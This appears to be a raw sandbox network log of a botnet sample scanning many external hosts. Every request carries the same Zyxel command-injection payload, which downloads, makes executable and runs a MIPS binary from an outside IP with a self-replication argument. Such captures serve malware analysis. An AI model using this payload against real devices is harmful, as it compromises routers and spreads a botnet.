                                                Jan 12, 2024 18:16:18.330111980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3253192.168.2.2333366208.77.161.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330121994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3254192.168.2.234587893.84.3.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330180883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3255192.168.2.233710460.91.211.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330216885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3256192.168.2.2348136176.196.7.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330267906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3257192.168.2.236020025.216.42.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330321074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3258192.168.2.2348124212.49.144.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330343962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3259192.168.2.2359908119.87.50.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330370903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3260192.168.2.2341584102.193.96.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330411911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3261192.168.2.234989217.29.75.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330470085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3262192.168.2.2360008207.67.194.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330518007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3263192.168.2.233321023.3.121.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330559969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3264192.168.2.233705662.178.12.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330584049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3265192.168.2.2349348109.232.29.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330629110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3266192.168.2.2340196103.237.54.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330674887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3267192.168.2.23378745.134.255.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330697060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3268192.168.2.235295439.237.151.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330754995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3269192.168.2.236008046.35.16.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330768108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3270192.168.2.2359082221.45.80.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330831051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3271192.168.2.235362495.95.45.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330852985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3272192.168.2.235183487.221.107.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330890894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3273192.168.2.2354030156.121.133.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330914974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3274192.168.2.234397294.21.19.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.330955029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3275192.168.2.235551496.26.102.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331010103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3276192.168.2.235507498.120.102.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331047058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3277192.168.2.2354966189.17.63.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331079006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3278192.168.2.2353516195.160.107.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331124067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3279192.168.2.234971017.214.16.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331151009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3280192.168.2.2336376109.81.33.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331197023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3281192.168.2.2333434209.121.53.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331248045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3282192.168.2.2347320177.0.126.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331268072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3283192.168.2.234449285.95.22.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331314087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3284192.168.2.233592871.47.61.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331365108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3285192.168.2.2342902216.132.229.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331393003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3286192.168.2.2335840137.71.105.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331425905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3287192.168.2.2340572187.230.143.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331481934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3288192.168.2.2351792209.185.149.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331509113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3289192.168.2.235290287.76.74.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331547022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3290192.168.2.2349406161.241.205.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331577063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3291192.168.2.234997678.253.192.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331645966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3292192.168.2.2355000198.124.158.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331679106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3293192.168.2.2333408116.155.247.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331743002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3294192.168.2.234482075.61.59.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331767082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3295192.168.2.2346206178.146.51.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331831932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3296192.168.2.233392873.238.226.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331845999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3297192.168.2.2335670156.132.253.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331882954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3298192.168.2.2333386204.170.227.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331926107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3299192.168.2.2335842134.145.186.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331950903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3300192.168.2.233461819.39.31.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.331968069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3301192.168.2.235870486.79.28.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332011938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3302192.168.2.233551498.19.216.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332055092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3303192.168.2.2347600135.250.47.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332091093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3304192.168.2.233377438.70.166.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332130909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3305192.168.2.235064465.134.44.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332192898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3306192.168.2.2352274154.86.232.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332207918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3307192.168.2.235424223.51.206.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332231045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3308192.168.2.2339332219.208.201.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332257986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3309192.168.2.2338960109.185.156.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332309961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3310192.168.2.233654648.231.91.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332334042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3311192.168.2.233926883.12.224.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332367897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3312192.168.2.2334274223.146.15.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332434893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3313192.168.2.233583436.165.115.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332462072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3314192.168.2.2358796178.48.79.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:18.332494974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3315192.168.2.2341540142.144.49.240443
                                                TimestampBytes transferredDirectionData
